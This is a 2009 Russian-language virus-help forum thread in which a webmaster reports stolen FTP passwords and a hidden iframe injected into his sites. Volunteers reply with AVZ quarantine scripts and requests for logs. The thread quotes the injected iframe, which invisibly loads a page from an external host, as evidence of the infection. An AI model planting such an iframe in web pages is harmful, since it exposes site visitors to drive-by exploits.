Кража фтп-паролей

Printable View

27.08.2009, 01:08
maximba

Вложений: 1

Кража фтп-паролей

Емеется несколько сайтов Периодически в файлах стартовой страницы появляется странный код типа этого:

<iframe src="http://ultralitecar.cn:8080/index.php" width=177 height=104 style="visibility: hidden"></iframe>

Причем на каждом сайте. Поменял пароли фтп -не помогло. Похоже, какая-то дрянь отправляет пароли своим владельцам или сама соединяется по фтп Еще странное дело - когда открываю некоторые сайты зачем-то запускается Акробат. Можно тут чем-то помочь?
27.08.2009, 10:00
Kuzz

1.[url=http://avptool.virusinfo.info/ru/AVPTool_helpdesk_curescript.htm]AVPtool, "Ручное лечение" --> Скопировать ниже написанный скрипт--> Нажать кнопку "Выполнить".[/url]
[CODE]begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
QuarantineFile('C:\WINDOWS\system32\drivers\i386si.sys','');
QuarantineFile('c:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe','');
QuarantineFile('C:\WINDOWS\System32\ATMsrvc.exe','');
QuarantineFile('C:\WINDOWS\TWAIN_32\S6U12BX\SBSpi_T.dll','');
QuarantineFile('C:\WINDOWS\system32\dnssd.dll','');
QuarantineFile('c:\program files\webmoney agent\wmagent.exe','');
DeleteFile('C:\WINDOWS\system32\drivers\i386si.sys');
BC_ImportDeletedList;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.[/CODE]
После выполнения скрипта компьютер перезагрузится.

Потом еще один:
[CODE]begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.
[/CODE]
Прислать карантин согласно дополнения [b][url=http://avptool.virusinfo.info/ru/AVPTool_helpdesk_fileattach.htm]Как прислать запрошенные файлы[/url][/b].
Он находится в папке программы и называется "quarantine.zip"
Загружать по красной ссылке вверху этой темы [B][COLOR="Red"]"Прислать запрошенный карантин"[/COLOR][/B]

2.Повторить логи

[size="1"][color="#666686"][B][I]Добавлено через 3 минуты[/I][/B][/color][/size]

[QUOTE='maximba;456850']Еще странное дело - когда открываю некоторые сайты зачем-то запускается Акробат[/QUOTE]
Очень похоже на то, что эти сайты тоже заражены. Т.к. для заражения пользовательских машин используются эксплоиты и для адобовских продуктов - запуск ридера показателен.
27.08.2009, 13:14
maximba

А что значит "Повторить логи"?
27.08.2009, 13:23
Rene-gad

[QUOTE=maximba;457117]А что значит "Повторить логи"?[/QUOTE]Повторите в точности действия, описанные в пп.1 - 3 раздела правил Диагностика, новые логи прикрепите к новому сообщению.
27.08.2009, 13:55
maximba

Вложений: 1

Вот

Лог
27.08.2009, 13:57
Rene-gad

Прочитайте и выполните: [url]http://virusinfo.info/showthread.php?t=43700[/url]
- Удалите [URL="http://virusinfo.info/showthread.php?t=27923"]Bonjour[/URL].
Жалобы есть?
28.08.2009, 13:57
CyberHelper

Итог лечения

Статистика проведенного лечения:
[LIST][*]Получено карантинов: [B]1[/B][*]Обработано файлов: [B]5[/B][*]В ходе лечения вредоносные программы в карантинах не обнаружены[/LIST]